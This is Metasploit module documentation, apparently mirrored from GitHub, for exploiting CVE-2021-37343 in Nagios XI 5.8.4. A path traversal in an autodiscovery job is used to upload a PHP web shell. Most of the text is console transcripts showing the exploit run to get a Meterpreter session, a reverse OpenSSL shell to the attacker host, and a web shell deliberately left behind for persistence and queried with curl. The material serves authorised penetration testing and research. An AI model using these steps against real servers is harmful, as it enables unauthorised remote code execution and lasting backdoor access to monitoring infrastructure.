nagios_xi_autodiscovery_webshell.md

/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md

https://github.com/rapid7/metasploit-framework
Markdown | 226 lines | 188 code | 38 blank | 0 comment | 0 complexity | 8de2681c871a648f4c875eaa4d21eb0f MD5 | raw file

## Vulnerable Application

### Description

This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path
traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as
`www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a
path traversal to a writable and remotely accessible directory, and `custom_ports` field containing
the web shell. A cron file will be created using the attacker's chosen path and name, and the web
shell is embedded in the file.

After the web shell has been written to the victim, this module will then use the webshell to establish
a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the
autodiscovery job is removed as well.

### Installation

The following was tested on Ubuntu 20.04.

* wget https://assets.nagios.com/downloads/nagiosxi/5/xi-5.8.4.tar.gz
* tar -xvf xi-5.8.4.tar.gz
* cd nagiosxi
* sudo ./fullinstall

The installer will spend a good deal of time installing many things. Upon completion, navigate to
the Web UI, accept license agreements, and configure the administrator username and password.

## Verification Steps

* Follow the instructions above to install Nagios XI 5.8.4 on Ubuntu 20.04
* Do: `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
* Do: `set RHOST <ip>`
* Do: `set PASSWORD <password>`
* Do: `check`
* Verify the target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `run`
* You should get a Meterpreter session.

## Options

### TARGETURI

Specifies base URI. The default value is `/nagiosxi`.

### USERNAME

The username to log in to the Nagios XI web interface with. The default is `nagiosadmin`.

### PASSWORD

The password to log in with. Set to `nil` by default.

### DEPTH

The depth of the path traversal. Default is 10.

### WEBSHELL_NAME

Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.
Set to `nil` by default.

### DELETE_WEBSHELL

Indicates if the web shell should be deleted after the meterpreter session or reverse shell is established.
A user may want to leave behind a web shell for persistence reasons. The default is `true`.

## Scenarios

### Nagios XI 5.8.4 - Get a Meterpreter Session

```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.8.4
[+] The target appears to be vulnerable to the following 1 exploit(s):
[*] 
[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44224 ) at 2022-02-05 17:53:27 -0800

meterpreter > shell
Process 800816 created.
Channel 1 created.
uname -a
Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
whoami
www-data
pwd
/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
```

### Nagios XI 5.8.4 - Get a reverse shell

```
msf6 > use auxiliary/scanner/http/nagios_xi_scanner
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 auxiliary(scanner/http/nagios_xi_scanner) > run

[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.8.4
[+] The target appears to be vulnerable to the following 1 exploit(s):
[*] 
[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
target => 0
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse double SSL handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Executing Unix Command for cmd/unix/reverse_openssl
[*] Deleting autodiscovery job
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo nyjlVFXNgWehsWFs;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "nyjlVFXNgWehsWFs\n"
[*] Matching...
[*] A is input...
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44226 ) at 2022-02-05 17:56:49 -0800

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
pwd
/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
```

### Nagios XI 5.8.4 - Leave a web shell behind

```
msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
DELETE_WEBSHELL => false
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
WEBSHELL_NAME => lobster.php
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44230 ) at 2022-02-05 18:07:14 -0800

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 10.0.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > exit
albinolobster@ubuntu:~/metasploit-framework$ curl --insecure https://10.0.0.6/nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php?cmd=id
0 9 * * *	rm -f '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml'; touch '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch'; sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses='127.0.0.1/0' --exclude='' --output='../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml' --watch='/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch' --onlynew=0 --debug=1 --detectos=1 --detecttopo=1   --customports='uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
' > '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.out' 2>&1 & echo $! > /dev/null 2>&1
```